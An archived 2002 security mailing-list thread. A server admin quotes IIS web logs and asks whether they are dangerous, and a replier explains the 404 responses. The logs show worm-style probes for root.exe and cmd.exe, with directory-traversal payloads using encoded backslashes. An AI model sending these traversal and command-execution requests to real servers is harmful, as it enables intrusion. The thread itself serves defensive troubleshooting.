RE: !!!!URGENT - SCARY website LOGS!!!!

• From: "Joseph" <cismic@xxxxxxx>
• To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
• Date: Tue, 26 Mar 2002 23:21:57 -0800

It is not always a good idea to keep ISA on the same machine with all
the other applications that you mentioned.  
The 404 error code says that your ok meaning url not found.

Joseph

-----Original Message-----
From: Sushil Bhalla [mailto:sushilb@xxxxxxxxxxxxxxxxx] 
Sent: Tuesday, March 26, 2002 10:07 PM
To: [ISAserver.org Discussion List]
Subject: [isalist] !!!!URGENT - SCARY website LOGS!!!!

http://www.ISAserver.org


Hello All,

I have W2K, E2K, ISA2K, ISM all installed on one server.

Recently I have allowed inbound HTTPServer Inbound (port 80) connection
(through ISA PACKET FILTERING) to allow my website to be viewed and
after
going though my website logs, I got very worried.

Following is what I am getting my logs every few hours. 

Can someone tell me URGENTALLY what kind of request are these? Should I
be
worried? What can I do to prevent these?

Thanks in advance for any help.

Sushil Bhalla

#Date: 2002-03-27 00:19:03
#Fields: date time c-ip cs-username s-sitename s-computername s-ip
s-port
cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes
cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie)
cs(Referer)
2002-03-27 00:19:03 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/scripts/root.exe /c+dir 404 3 3396 72 15 HTTP/1.0 www - - -
2002-03-27 00:19:04 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/MSADC/root.exe /c+dir 404 3 3396 70 0 HTTP/1.0 www - - -
2002-03-27 00:19:09 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 HTTP/1.0 www - - -
2002-03-27 00:19:10 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 16 HTTP/1.0 www - - -
2002-03-27 00:19:11 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 16 HTTP/1.0
www - - -
2002-03-27 00:19:14 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3
3396
117 0 HTTP/1.0 www - - -
2002-03-27 00:19:19 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3
3396
117 0 HTTP/1.0 www - - -
2002-03-27 00:19:20 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 404 3 3396 145 0 HTTP/1.0 www - - -
2002-03-27 00:19:22 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0
www
- - -
2002-03-27 00:19:23 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 15 HTTP/1.0 www - -
-
2002-03-27 00:19:25 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
2002-03-27 00:19:27 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
/winnt/system32/cmd.exe /c+dir 404 3 3396 97 16 HTTP/1.0 www - - -

------------------------------------------------------
You are currently subscribed to this ISAserver.org Discussion List as:
cismic@xxxxxxx
To unsubscribe send a blank email to $subst('Email.Unsub')

Other related posts:

• » !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!
• » RE: !!!!URGENT - SCARY website LOGS!!!!

1. Home
2. isalist
3. Archive
4. 03-2002

---

• » Previous by Date
• » Next by Date
• » Related Posts
• » View list details
• » Manage your subscription

---